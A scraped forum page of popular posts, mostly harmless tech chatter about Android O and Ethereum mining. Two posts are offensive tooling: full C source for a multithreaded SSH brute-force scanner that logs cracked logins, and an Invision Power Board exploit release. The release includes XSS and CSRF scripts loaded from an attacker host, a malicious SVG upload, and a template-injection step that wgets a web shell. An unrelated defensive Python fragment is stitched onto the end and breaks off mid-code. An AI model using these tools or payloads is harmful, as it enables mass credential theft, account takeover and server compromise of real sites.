
Leaderboard

Popular Content

Showing content with the highest reputation on 05/22/17 in all areas

  1. Which mobile phones can run Android O in the DP2 version. Author: Emil Dragotă, Date: 21.05.2017, 21:52. Android O in the Developer Preview 2 version has been released by Google. It can be installed on the Nexus 5X, Nexus 6P, Pixel, Pixel XL, Pixel C and Nexus Player. How can you install Android O DP2 on the devices mentioned? There are several alternatives: the Android O Beta Program; a factory image for each individual device. What is new in Android O DP2? Quick settings with an updated design; the ability to change the icon shape for applications (normal, round, square etc.); access to an application's widgets via long press (available only in the preinstalled launcher, Pixel Launcher); night light mode with adjustable intensity on the brightness side; native support for password managers (Settings / System / Languages & input / Advanced, where the autofill option appears); new management options for the energy stored in the battery. Google limits applications that need constant location refreshes, and there are several optimisations so that the user gets concrete data on the consumption generated by each individual application, charging information etc.; Picture-in-Picture mode taken to a higher level, with a dedicated page in settings; Instant Apps, the ability to try an application without having to install it on the device; new options in the Wi-Fi and network area; a new design for the Storage section in settings. More details at the source link. Google develops on the fly and takes in real feedback, which is what makes the operating system evolve and be far more mature from the first day it is released commercially. By summer we will have Android 8.0 Oreo in its final edition, as well as the first mobile phones with this software distribution.
Sursa: https://www.gadget.ro/ce-telefoane-mobile-pot-rula-android-o-versiunea-dp2/
    2 points
  2. Hello, The scanner uses libssh2 (libssh2), pscan.c (included in the source code). To run a class B scan: ./brute -b 10.10 -t 1800 -user users.lst -pass pass.lst -p 22 -c "uname -a" For brute-forcing an IP list: ./brute -f ip.lst -t 1800 -user users.lst -pass pass.lst -p 22 -c "uname -a" -t = number of threads -p = port -c = the command to execute; ip.lst = list of IPs, one per line; user.lst = list of users, one per line; pass.lst = list of passwords, one per line. If you put $user in pass.lst, the password will be the same as the username; if you put $user123, the password will be user123, e.g. user: oracle pass: $user123 and the scanner will try oracle:oracle123. Hope you like it. Initially it also had random IP generation, but I removed it. Recheck the source code if you get compile errors.

#define LIBSSH2_STATIC 1 #include "libssh2_config.h" #include <libssh2.h> #ifdef HAVE_WINSOCK2_H # include <winsock2.h> #endif #ifdef HAVE_SYS_SOCKET_H # include <sys/socket.h> #endif #ifdef HAVE_NETINET_IN_H # include <netinet/in.h> #endif #ifdef HAVE_SYS_SELECT_H # include <sys/select.h> #endif # ifdef HAVE_UNISTD_H #include <unistd.h> #endif #ifdef HAVE_ARPA_INET_H # include <arpa/inet.h> #endif #include <sys/time.h> #include <sys/types.h> #include <stdlib.h> #include <fcntl.h> #include <string.h> #include <errno.h> #include <stdio.h> #include <ctype.h> #include <netdb.h> #include <time.h> #include <sys/wait.h> #include <termios.h> #define ALB "\033[1;37m" #define ALB2 "\033[5;37m" #define NORM "\033[00;00m" #define BOLD "\033[00;01m" #define ROSU "\033[01;31m" #define GALBE "\033[01;33m" #define VERDE "\033[01;32m" #define ALBASTRU "\033[01;34m" #define FAKE "./jahid" #define COMPUTATIONS 3000 #define TOTAL_VAL_COUNT 254 #define MAX_SOCKETS 1000 #define TIMEOUT 3 #define S_NONE 0 #define S_CONNECTING 1 #define TABLELEN 63 #define BUFFFERLEN 128 #define ENCODERLEN 4 #define ENCODEROPLEN 0 #define ENCODERBLOCKLEN 3 #define PADDINGCHAR '=' #define BASE64CHARSET 
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"\ "abcdefghijklmnopqrstuvwxyz"\ "0123456789"\ "+/"; #define _FILE_OFFSET_BITS 64 #define EOL '\n' #define CAR_RETURN '\r' #define SUCCESS 0 #define FAILURE -1 struct conn_t { int s; char status; time_t a; struct sockaddr_in addr; }; struct conn_t connlist[MAX_SOCKETS]; void init_sockets(void); void check_sockets(void); void fatal(char *); FILE *outfd; int tot = 0; int flag,where; int numforks,maxf; unsigned char denominator = TOTAL_VAL_COUNT+1; char *replace_str(char *str, char *orig, char *rep) { static char buffer[4096]; char *p; if(!(p = strstr(str, orig))) return str; strncpy(buffer, str, p-str); buffer[p-str] = '\0'; sprintf(buffer+(p-str), "%s%s", rep, p+strlen(orig)); return buffer; } void init_sockets(void) { int i; for (i = 0; i < MAX_SOCKETS; i++) { connlist[i].status = S_NONE; memset((struct sockaddr_in *)&connlist[i].addr, 0, sizeof(struct sockaddr_in)); } return; } void check_sockets(void) { int i, ret; for (i = 0; i < MAX_SOCKETS; i++) { if ((connlist[i].a < (time(0) - TIMEOUT)) && (connlist[i].status == S_CONNECTING)) { close(connlist[i].s); connlist[i].status = S_NONE; } else if (connlist[i].status == S_CONNECTING) { ret = connect(connlist[i].s, (struct sockaddr *)&connlist[i].addr, sizeof(struct sockaddr_in)); if (ret == -1) { if (errno == EISCONN) { tot++; fprintf(outfd, "%s\n", (char *)inet_ntoa(connlist[i].addr.sin_addr)); close(connlist[i].s); connlist[i].status = S_NONE; } if ((errno != EALREADY) && (errno != EINPROGRESS)) { close(connlist[i].s); connlist[i].status = S_NONE; } } else { tot++; fprintf(outfd, "%s\n", (char *)inet_ntoa(connlist[i].addr.sin_addr)); close(connlist[i].s); connlist[i].status = S_NONE; } } } } void fatal(char *err) { int i; printf("Error: %s\n", err); for (i = 0; i < MAX_SOCKETS; i++) if (connlist[i].status >= S_CONNECTING) close(connlist[i].s); fclose(outfd); exit(EXIT_FAILURE); } static int waitsocket(int socket_fd, LIBSSH2_SESSION *session) { struct timeval timeout; int rc; fd_set fd; 
fd_set *writefd = NULL; fd_set *readfd = NULL; int dir; timeout.tv_sec = 2; timeout.tv_usec = 0; FD_ZERO(&fd); FD_SET(socket_fd, &fd); dir = libssh2_session_block_directions(session); if(dir & LIBSSH2_SESSION_BLOCK_INBOUND) readfd = &fd; if(dir & LIBSSH2_SESSION_BLOCK_OUTBOUND) writefd = &fd; rc = select(socket_fd + 1, readfd, writefd, NULL, &timeout); return rc; } int checkauth(char *username,char *password,char *hostname, char *portar, char *command) { const char *commandline = command; FILE *vulnf,*nolog; unsigned long hostaddr; int sock, port; struct sockaddr_in sin; const char *fingerprint; LIBSSH2_SESSION *session; LIBSSH2_CHANNEL *channel; int rc; int exitcode; char *exitsignal=(char *)"none"; int bytecount = 0; size_t len; int type, var; struct timeval timeout; timeout.tv_sec = 10; timeout.tv_usec = 0; port=atoi(portar); rc = libssh2_init (0); if (rc != 0) { fprintf (stderr, "libssh2 initialization failed (%d)\n", rc); return 1; } hostaddr = inet_addr(hostname); sock = socket(AF_INET, SOCK_STREAM, 0); sin.sin_family = AF_INET; sin.sin_port = htons(port); sin.sin_addr.s_addr = hostaddr; if (setsockopt (sock, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout, sizeof(timeout)) < 0) error("setsockopt failed\n"); if (setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)) < 0) error("setsockopt failed\n"); if (connect(sock, (struct sockaddr*)(&sin), sizeof(struct sockaddr_in)) != 0) { return -1; } session = libssh2_session_init(); while ((rc = libssh2_session_handshake(session, sock)) == LIBSSH2_ERROR_EAGAIN); if (rc) { return -1; } while ((rc = libssh2_userauth_password(session, username, password)) == LIBSSH2_ERROR_EAGAIN); if (rc) { goto shutdown; } while( (channel = libssh2_channel_open_session(session)) == NULL && libssh2_session_last_error(session,NULL,NULL,0) == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } if( channel == NULL ) { goto shutdown; } while( (rc = libssh2_channel_exec(channel, commandline)) == LIBSSH2_ERROR_EAGAIN ) { 
waitsocket(sock, session); } if( rc != 0 ) { goto shutdown; } for( ;; ) { int rc; do { char buffer[65535]; rc = libssh2_channel_read( channel, buffer, sizeof(buffer) ); if( rc > 0 ) { int i; bytecount += rc; hostname = strtok (hostname, "\n"); fprintf(stderr, "[*] WOW : %s:%s %s port: %s \n", username,password,hostname, portar); fprintf(stderr, "[*] Kernel: %s \n", buffer); vulnf=fopen("sparte.txt","a+"); fprintf(vulnf,"%s:%s %s port: %s --> %s \n",username,password,hostname,portar, buffer); fclose(vulnf); goto shutdown; for( i=0; i < rc; ++i ) var = i; } else { if( rc != LIBSSH2_ERROR_EAGAIN ) goto shutdown; } } while( rc > 0 ); if( rc == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } else break; } exitcode = 127; while( (rc = libssh2_channel_close(channel)) == LIBSSH2_ERROR_EAGAIN ) waitsocket(sock, session); if( rc == 0 ) { exitcode = libssh2_channel_get_exit_status( channel ); libssh2_channel_get_exit_signal(channel, &exitsignal, NULL, NULL, NULL, NULL, NULL); } if (exitsignal) var = var; else var = var; libssh2_channel_free(channel); close(sock); channel = NULL; libssh2_session_disconnect(session, "Normal Shutdown, Thank you for playing"); libssh2_session_free(session); libssh2_exit(); exit(0); shutdown: libssh2_session_disconnect(session, "Normal Shutdown, Thank you for playing"); libssh2_session_free(session); #ifdef WIN32 closesocket(sock); #else close(sock); #endif var = var; libssh2_exit(); return 0; } int scanbclass(char *bclass, char *port) { int done = 0, i, cip = 1, bb = 0, ret, k, ns, x; time_t scantime; char ip[20], outfile[128], last[256]; int unlink(const char *pathname); errno = 0; if(unlink("scan.log")) { printf("\n unlink() failed - [%s]\n",strerror(errno)); } memset(&outfile, 0, sizeof(outfile)); snprintf(outfile, sizeof(outfile) - 1, "scan.log", bclass, port); if (!(outfd = fopen(outfile, "a"))) { perror(outfile); exit(EXIT_FAILURE); } printf("[-] Searching: ", bclass); fflush(stdout); memset(&last, 0, sizeof(last)); init_sockets(); 
scantime = time(0); while(!done) { for (i = 0; i < MAX_SOCKETS; i++) { if (cip == 255) { if (bb == 255) { ns = 0; for (k = 0; k < MAX_SOCKETS; k++) { if (connlist[k].status > S_NONE) { ns++; break; } } if (ns == 0) done = 1; break; } else { cip = 0; bb++; for (x = 0; x < strlen(last); x++) putchar('\b'); memset(&last, 0, sizeof(last)); snprintf(last, sizeof(last) - 1, "%s.%d.* on port: %s [Found: %d] [%.1f%% Done]", bclass, bb, port, tot, (bb / 255.0) * 100); printf("%s", last); fflush(stdout); } } if (connlist[i].status == S_NONE) { connlist[i].s = socket(AF_INET, SOCK_STREAM, 0); if (connlist[i].s == -1) printf("Unable to allocate socket.\n"); else { ret = fcntl(connlist[i].s, F_SETFL, O_NONBLOCK); if (ret == -1) { printf("Unable to set O_NONBLOCK\n"); close(connlist[i].s); } else { memset(&ip, 0, 20); sprintf(ip, "%s.%d.%d", bclass, bb, cip); connlist[i].addr.sin_addr.s_addr = inet_addr(ip); if (connlist[i].addr.sin_addr.s_addr == -1) fatal("Invalid IP."); connlist[i].addr.sin_family = AF_INET; connlist[i].addr.sin_port = htons(atoi(port)); connlist[i].a = time(0); connlist[i].status = S_CONNECTING; cip++; } } } } check_sockets(); } printf("\n[!] Scanning complete In %u Seconds. 
[We got %d ips]\n", (time(0) - scantime), tot); fclose(outfd); return 1; } int line_count(char* __str_file_name) { FILE* fd; int ch; if ((fd = fopen(__str_file_name, "r")) == NULL) { printf("[Error] : While opening the file\n"); exit(0); } unsigned int line_count = 0; while ( (ch = fgetc(fd)) != EOF) if (ch == EOL || ch == CAR_RETURN) ++line_count; if (fd) { fclose(fd); } return line_count; } int scan(char *app, char *thr, char *ipfile, char *userfile, char *passfile, char *portar, char *commandline) { int numforks, maxf, status; FILE *fp,*passf, *userf; char buff[4096]; char nutt2[4096]; char nutt[4096]; char *pass, *user; malloc(sizeof(nutt)); malloc(sizeof(nutt2)); malloc(sizeof(buff)); pid_t PID; char *ns = NULL; maxf=atoi(thr); if((userf=fopen(userfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s \n", userfile)); while (fgets(nutt2,sizeof(nutt2),userf)){ user = strdup (nutt2); user = strtok (user, "\n"); if((passf=fopen(passfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s \n", passfile)); while (fgets(nutt,sizeof(nutt),passf)) { pass = strdup (nutt); pass = strtok (pass, "\n"); ns = replace_str(pass, "$user", user); printf("[*] Trying: %s:%s on found ips\n",user,ns); if((fp=fopen(ipfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s", ipfile)); while(fgets(buff,sizeof(buff),fp)) { PID = fork(); if (PID < 0) { fprintf(stderr, "[!] 
Couldn't fork!\n"); exit(1); } if (( PID == 0 )){ checkauth(user,ns,buff, portar, commandline); //printf("[*] Trying: %s:%s %s:%s Protocol:%s\n",user,ns, buff,portar,prot); exit(0); } else { numforks++; if (numforks > maxf) for (numforks; numforks > maxf; numforks--) PID = wait(&status); } } fclose(fp); } fclose(passf); } fclose(userf); exit(0); } int main(int argc, char *argv[]) { int input,i=0; FILE *fp,*passf, *userf, *scanf; char encodedoutput[BUFFFERLEN + 1] = ""; char decodedoutput[BUFFFERLEN + 1] = ""; char *userfile, *passfile, *command, *threads, *scanfile, *bclass, *port, *t2, *prot; if(strcmp(argv[1],"-f")==0) { input = 1; } if(strcmp(argv[1],"-r")==0) { input = 2; } if(strcmp(argv[1],"-R")==0) { input = 3; } if(strcmp(argv[1],"-b")==0) { input = 4; } switch ( input ) { case 1: for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; } if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; } } scanfile = argv[2]; if((scanf=fopen(scanfile,"r"))!= NULL){ if (atoi(threads)) { if (atoi(port) > 2) { if((userf=fopen(userfile,"r"))!=NULL){ if((passf=fopen(passfile,"r"))!=NULL){ if(command != NULL) { scan(argv[0],threads,scanfile,userfile,passfile,port,command);} else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } break; case 2: for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; } if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; } } if (atoi(threads)) { if (atoi(port) > 2) { if((userf=fopen(userfile,"r"))!=NULL){ if((passf=fopen(passfile,"r"))!=NULL){ if(command != NULL) { 
//genrand(argv[0],threads,userfile,passfile,port,command); } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } break; case 3: for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } } if (atoi(threads)) { if (atoi(port) > 2) { //genrandl(threads, port); } else { goto err; } } else { goto err; } break; case 4: for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; } if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; } } bclass = argv[2]; if (atoi(threads)) { if (atoi(port) > 2) { if((userf=fopen(userfile,"r"))!=NULL){ if((passf=fopen(passfile,"r"))!=NULL){ if(command != NULL) { scanbclass(bclass, port); scan(argv[0],threads,"scan.log",userfile,passfile,port, command); } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } } else { goto err; } break; default: printf( "Bad command, quitting!\n" ); exit (0); break; } getchar(); exit (0); err: exit (-1); } JIHAD!
    1 point
  3. If you shut down the PC, when you reconnect you only need to download part of the blockchain (resynchronisation), which depends on how long you stay disconnected. You do not need to create another address every time you reconnect. Also, when you mine in geth, you mine on top of the last block in the local blockchain (so you have to synchronise first) and you mine directly to the address in etherbase. Oh, and READ THE MANUAL! THERE IS VERY GOOD DOCUMENTATION ON THE OFFICIAL SITE! (use Google Translate if you need to) https://github.com/ethereum/go-ethereum/wiki/Managing-your-accounts https://ethereum.stackexchange.com/questions/392/how-can-i-get-a-geth-node-to-download-the-blockchain-quickly https://github.com/ethereum/go-ethereum/wiki/mining https://github.com/ethereum/go-ethereum/wiki/Command-Line-Options
    1 point
  4. How many GPUs do you have? I do not recommend mining solo. You find blocks quite rarely and you have to mine a lot. (Note that the network hashrate is quite high and growing; I think the difficulty per block will rise quickly.) I mined at 28 Mh/s in a pool (miningpoolhub). The advantage is that you do not have to download the blockchain and payment is PPLNS (google it), i.e. in small, frequent portions. Solo mining is worth it if you have over 80-100 Mh/s. My wallet is from myetherwallet.com. It is fairly secure and convenient to use. (If I catch anyone commenting nonsense that eth/myetherwallet/miningpool is not secure or has vulnerabilities, I will screw you.) I am tired of kids who comment without understanding even the simplest concept: "I don't think it's secure", "it doesn't inspire confidence".
    1 point
  5. INSECURITY
[+]--------------------------------------------------------------[+]
| Vulnerable Software: Invision Power Board |
| Tested on: v4.1.4.1 (current build) |
| Vendor: http://invisionpower.com/ |
| Vulnerability Type: Reflected and Stored XSS |
| Cross-Site Request Forgery |
| File Upload (svg) |
| Information Disclosure |
| Shell Access via ACP |
| Date Released: 09/05/2017 |
| Released by: CDL (@sxcurity) + dkb (svg method) |
[+]--------------------------------------------------------------[+]
[+] Description: Invision Power Board version 4.1.19.2 (current version as of this release) and below is vulnerable to pre-auth reflected XSS in the IPS UTF8 Converter v1.1.18 and stored XSS in the Announcements. The vulnerability in the IPS UTF8 Converter can easily be used to make a malicious announcement that then affects any user that views the announcement. There are also Stored XSS + Information Disclosure vulnerabilities in the attachments feature found in User CP. This can be triggered by any user and can be used to gain access to mod/admin accounts.
-------------------------------------------------------------------------------------------------------------
[+] Summary: The IPS UTF8 Converter does not properly sanitize the `controller` parameter, which is reflected in the response.
Therefore, an attacker may craft a payload to close the current expression and insert malicious javascript and HTML. The stored xss via the announcements requires a moderator or admin account to exploit. If you create a new announcement, you can choose the "<> Source" option, which does not validate HTML tags or event handlers. This allows anyone with access to a moderator account to attack all users, mods, and admins. [+] In addition to this, it is possible to trigger stored XSS via a file upload bug regarding attachments. This also leads to information disclosure (FPD + the path to the uploaded SVG file, allowing you to bypass the randomly generated filename). This stored XSS can be achieved from any user account. No mod or admin privs required. A regular user can craft a payload to make themselves admin as a result of this vulnerability. There are very specific steps required to reproduce this bug, which will be detailed after the first Proof of Concept is displayed. ------------------------------------------------------------------------------------------------------------- [+]========= Proof of Concepts =========[+] [+] Video: https://drive.google.com/file/d/0B3vXUYdNMECWMHVMaGVlMjVZMjg/view?usp=sharing [+] Simple alert http://<target>/admin/convertutf8/index.php?controller=%27};alert(document.domain);{%27 [+] Triggering stored XSS in announcements. http://<target>/admin/convertutf8/index.php?controller='};</script><script src=//<attacker>/xss.js></script>;{' If a moderator or admin visits this URL, the script steals the CSRF tokens from the mod/admin, builds the CSRF form with the payload, and creates a malicious announcement with the attacker's specified XSS payload. When anyone reads this announcement, the XSS will fire! 
[+] Abusing this XSS to attack users http://<target>/admin/convertutf8/index.php?controller='};</script><script src=//<attacker>/lol.js></script>;{' When a logged in user visits this page, it will steal the user's CSRF token, enable status updates and then change their "About Me" to "sxcurity is my hero" ;) [+]======= xss.js =======[+] /* http://www.sxcurity.pro/pocs/xss.js _ (_)_ ____ ___ __ | | '_ \ \ /\ / / '_ \ | | |_) \ V V /| | | | |_| .__/ \_/\_/ |_| |_| |_| IPB Exploit by @sxcurity */ // specifies the target, the title of the announcement, and the xss payload! var target = 'http://<target>/index.php?/modcp/announcements/&action=create'; var title = 'URGENT'; // Don't use quotes! It'll break our form down below! var payload = '<script src=//<ATTACKER>/lol.js></script>'; // steals the csrf token ;) var cdl = get(target); document.body.innerHTML = cdl; var form = document.getElementsByTagName('input')[3]; var token = form.value; // DON'T EDIT!! // Gets the current date! Thanks stackoverflow var today = new Date(); var dd = today.getDate(); var mm = today.getMonth()+1; //January is 0! 
var yyyy = today.getFullYear(); if(dd<10){ dd='0'+dd; } if(mm<10){ mm='0'+mm; } var today = mm+'/'+dd+'/'+yyyy; // build form with valid token and evil credentials document.body.innerHTML += '<form id="sxcurity" action="' + target + '" method="POST">' + '<input type="hidden" name="_submitted" value="1">' + '<input type="hidden" name="csrfKey" value="' + token + '">' + '<input type="hidden" name="MAX_FILE_SIZE" value="2097152">' + '<input type="hidden" name="plupload" value="sxcurity">' + '<input type="hidden" name="announce_title" value="' + title + '">' + '<input type="hidden" name="announce_start" value="' + today +'">' + '<input type="hidden" name="announce_end_unlimited" value="0">' + '<input type="hidden" name="announce_content" value="'+ payload +'">' + '<input type="hidden" name="announce_content_upload" value="sxcurity">' + '<input type="hidden" name="announce_app_unlimited" value="*">' + '<input type="hidden" name="announce_calendars">' + '<input type="hidden" name="announce_calendars-zeroVal" value="on">' + '<input type="hidden" name="announce_download_categories">' + '<input type="hidden" name="announce_download_categories-zeroVal" value="on">' + '<input type="hidden" name="announce_forums">' + '<input type="hidden" name="announce_forums-zeroVal" value="on">' + '</form>'; // submits our csrf form! document.forms["sxcurity"].submit(); function get(url) { var xmlHttp = new XMLHttpRequest(); xmlHttp.open("GET", url, false); xmlHttp.send(null); return xmlHttp.responseText; } [+]======= lol.js =======[+] /* www.sxcurity.pro/pocs/lol.js _ (_)_ ____ ___ __ | | '_ \ \ /\ / / '_ \ | | |_) \ V V /| | | | |_| .__/ \_/\_/ |_| |_| |_| IPB Exploit by @sxcurity index.php?/profile/<user>/&tab=field_core_pfield_1 This will add "sxcurity is my hero" to the user's about me. */ var target = 'http://localhost/ips_4141/index.php'; var payload = 'sxcurity is my hero'; // Gets the Profile URL of the victim. 
var cdl = get(target); document.body.innerHTML = cdl; var user_url = document.getElementsByTagName('a')[13]; var user_url1 = document.getElementsByTagName('a')[14]; var user_url2 = document.getElementsByTagName('a')[15]; var user_url3 = document.getElementsByTagName('a')[16]; var user_url4 = document.getElementsByTagName('a')[17]; var user_url5 = document.getElementsByTagName('a')[18]; var user_url6 = document.getElementsByTagName('a')[19]; var user_url7 = document.getElementsByTagName('a')[20]; var yay = user_url.href; var yay1 = user_url1.href; var yay2 = user_url2.href; var yay3 = user_url3.href; var yay4 = user_url4.href; var yay5 = user_url5.href; var yay6 = user_url6.href; var yay7 = user_url7.href; var mod_check0 = document.getElementsByTagName('a')[22]; var mod_check1 = document.getElementsByTagName('a')[22]; var mod_check2 = document.getElementsByTagName('a')[23]; var mod_check3 = document.getElementsByTagName('a')[24]; var mod_check4 = document.getElementsByTagName('a')[25]; var mod_check5 = document.getElementsByTagName('a')[26]; var mod_check6 = document.getElementsByTagName('a')[27]; var check0 = mod_check1.href; var check1 = mod_check1.href; var check2 = mod_check2.href; var check3 = mod_check3.href; var check4 = mod_check4.href; var check5 = mod_check5.href; var check6 = mod_check5.href; /* Mods / admins have a different amount of links before their profile URL, so this makes sure we grab the right profile URL and not some random one! */ if (yay.includes("profile")){ //user = normal user acc. var profile = yay; } else if (yay1.includes("profile")){ //user = normal user acc. var profile = yay1; } else if (yay2.includes("profile")){ //user = normal user acc. var profile = yay2; } else if (yay3.includes("profile")){ //user = normal user acc. var profile = yay3; } else if (yay4.includes("profile")){ //user = normal user acc. var profile = yay4; } else if (yay5.includes("profile")){ //user = normal user acc. 
var profile = yay5; } else if (yay6.includes("profile")){ //user = normal user acc. var profile = yay6; } else if (yay7.includes("profile")){ //user = normal user acc. var profile = yay7; } else if (check0.includes("profile")){ //user = mod or admin var profile = check0; } else if (check2.includes("profile")){ //user = mod or admin var profile = check2; } else if (check3.includes("profile")){ //user = mod or admin var profile = check3; } else if (check4.includes("profile")){ //user = mod or admin var profile = check4; } else if (check5.includes("profile")){ //user = mod or admin var profile = check5; } else if (check6.includes("profile")){ //user = mod or admin var profile = check6; } var final = profile + 'edit/'; // steals the csrf token var csrf = get(final); document.body.innerHTML = csrf; var inp = document.getElementsByTagName('input')[3]; var token = inp.value; // build form with valid token and evil credentials document.body.innerHTML += '<form id="woot" action=' + final + ' method="POST">' + '<input type="hidden" name="form_submitted" value="1">' + '<input type="hidden" name="csrfKey" value="' + token + '">' + '<input type="hidden" name="MAX_FILE_SIZE" value="2097152">' + '<input type="hidden" name="plupload" value="sxcurity">' + '<input type="hidden" name="bday[month]" value="0">' + '<input type="hidden" name="bday[day]" value="0">' + '<input type="hidden" name="bday[year]" value="0">' + '<input type="hidden" name="enable_status_updates" value="0">' + '<input type="hidden" name="enable_status_updates_checkbox" value="1">' + '<input type="hidden" name="core_pfield_1" value="' + payload + '">' + '<input type="hidden" name="core_pfield_1_upload" value="sxcurity">' + '</form>'; // submits our csrf form! 
document.forms["woot"].submit(); function get(url) { var xmlHttp = new XMLHttpRequest(); xmlHttp.open("GET", url, false); xmlHttp.send(null); return xmlHttp.responseText; } ------------------------------------------------------------------------------------------------------------- [+]========= Method 2 (Stored XSS via SVG upload) =========[+] Although the method above requires mod access, this next method will allow a regular user to obtain mod/admin access with relative ease. It involves uploading an SVG file as an attachment and then taking advantage of some information disclosure to get the path to the uploaded file, here are the steps to reproduce: 1 > Visit your profile and click edit profile 2 > Enable Status Updates 3 > Reload the page & select the status update input 4 > Click "add an attachment" and select your SVG file 5 > Once uploaded, reload the page (BEFORE you submit status update) 6 > Once page is reloaded, select the status page input box again. You will see your attachment already there 7 > Use inspect element or view the page source to find the path to where your attachment has been uploaded 8 > CTRL + F ".svg" and take advantage of the full path disclosure to get the upload location When your SVG file is uploaded, it generates a random hash to add to the URL name (as well as attempting to hide the upload path). In addition to status updates, this can also be achieved in threads (resulting in total chaos for the admin of the vuln site) The fact this can be used in threads makes it wormable. 
A regular user account can be used to target anyone who views any thread posted by that user (or any thread posted by ANY user if a specific worm-based payload was crafted).

Your malicious SVG file would look something like this (of course this is not a weaponized payload):

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie);"/>

If you refreshed and did inspect element at the right time, you should see something like this in the source:

-------------------------------------------------------------------------------------------------------------
data-ipsuploader-existingfiles="{&quot;102&quot;:{&quot;configuration&quot;:{&quot;dir&quot;:&quot;\/home\/services\/Services\/ipbcommunity\/uploads&quot;,&quot;url&quot;:&quot;uploads&quot;},&quot;configurationId&quot;:1,&quot;storageExtension&quot;:&quot;core_Attachment&quot;,&quot;originalFilename&quot;:&quot;xss.svg&quot;,&quot;filename&quot;:&quot;xss.svg.d9b51a7a276cfbc0625876e30bce299a.svg&quot;,&quot;container&quot;:&quot;monthly_2017_05&quot;,&quot;url&quot;:{&quot;data&quot;:{&quot;scheme&quot;:&quot;https&quot;,&quot;host&quot;:&quot;vuln.site.com&quot;,&quot;path&quot;:&quot;\/uploads\/monthly_2017_05\/xss.svg.d9b51a7a276cfbc0625876e30bce299a.svg&quot;},&quot;queryString&quot;:[],&quot;isInternal&quot;:true,&quot;isFriendly&quot;:true},&quot;tempId&quot;:null,&quot;attachmentThumbnailUrl&quot;:{&quot;data&quot;:{&quot;scheme&quot;:&quot;https&quot;,&quot;host&quot;:&quot;vuln.site.com&quot;,&quot;path&quot;:&quot;\/uploads\/monthly_2017_05\/xss.svg.d9b51a7a276cfbc0625876e30bce299a.svg&quot;},&quot;queryString&quot;:[],&quot;isInternal&quot;:true,&quot;isFriendly&quot;:true},&quot;thumbnailName&quot;:null,&quot;thumbnailContainer&quot;:null}}"
-------------------------------------------------------------------------------------------------------------

From there, you can see the full path:

In addition to this, we can also look at the URL in the source here to get the correct URL for where the XSS has been uploaded (there is a mechanism in place to attempt to prevent this from being possible by generating a unique string and adding it to the filename for the uploaded file, but by refreshing the page at the right time and viewing source we can see the full path for the upload including the unique string). Here is an example:

;:{&quot;scheme&quot;:&quot;https&quot;,&quot;host&quot;:&quot;community.vuln.com&quot;,&quot;path&quot;:&quot;\/uploads\/monthly_2017_05\/xss.svg.d9b51a7a276cfbc0625876e30bce299a.svg&quot;}

This can be seen in the source, which when decoded would translate to:

https://community.vuln.com/uploads/monthly_2017_05/xss.svg.d9b51a7a276cfbc0625876e30bce299a.svg

This can then either be used in a similar fashion to reflective XSS and linked to the victims, or it can be used within threads (via attachments) using the same method, which can allow someone from a regular user account to target the site's entire userbase (allowing for many possibilities, such as creating a worm, getting admin credentials, etc).

-------------------------------------------------------------------------------------------------------------

This method is semi-public but it's definitely worth including to show what XSSing an IPB admin could lead to.

Once access to the admin panel has been gained, the following method can be used to obtain a shell:

- Navigate to admin panel -> Go to "Look and Feel" -> Manage languages -> Choose language -> Choose Section -> look for 'public_help' -> edit 'help.txt' -> Choose topic from list

After this, a box should pop up where you can make edits to help.txt; the following PHP code can then be added:

-------------------------------------------------------------------------------------------------------------
${${print $query='cd cache; wget http://link_to_shell/shell.txt;mv shell.txt shell.php'}}
${${system($query,$out)}}
${${print $out}}
-------------------------------------------------------------------------------------------------------------

Make sure that this code is at the _bottom_ of the help module textfile, not anywhere else.

After this, navigate to the following URL to execute your code:

http://vuln.com/index.php?app=core&module=help

From here, you can access your shell via the following URL:

http://vuln.com/cache/shell.php

-------------------------------------------------------------------------------------------------------------

Timeline:
- Reported to IPB long ago
- Months passed
- Very bad communication
- Dropped for the lulz

[+]---------------------------------------------------------[+]
| CONTACT US:                                                 |
|                                                             |
| IRC: irc.insecurity.zone (6667/6697) #insecurity            |
| Twitter: @insecurity                                        |
| Website: insecurity.zone                                    |
[+]---------------------------------------------------------[+]
    1 point
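The root cause in the advisory above is an SVG attachment that keeps its `onload` handler and is served inline from the forum's own origin, so the handler runs with the forum's cookies. The following is an added example (not code from the advisory, from insecurity.zone or from IPB) of the defender-side check a site can run on SVG uploads before storing them, plus the response headers to put on user uploads it must still serve. The element and attribute lists, the header values and the sample SVGs are all constructed for this example; only the first sample mirrors the proof-of-concept shape quoted in the post.

```python
"""Defender-side pre-upload check for SVG attachments.

Added example for this thread, not code from the advisory or from IPB. It
assumes the application can inspect the upload bytes before storing them;
the element/attribute lists and the sample SVGs below are constructed.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

# Elements that execute script or pull in foreign content when an SVG is
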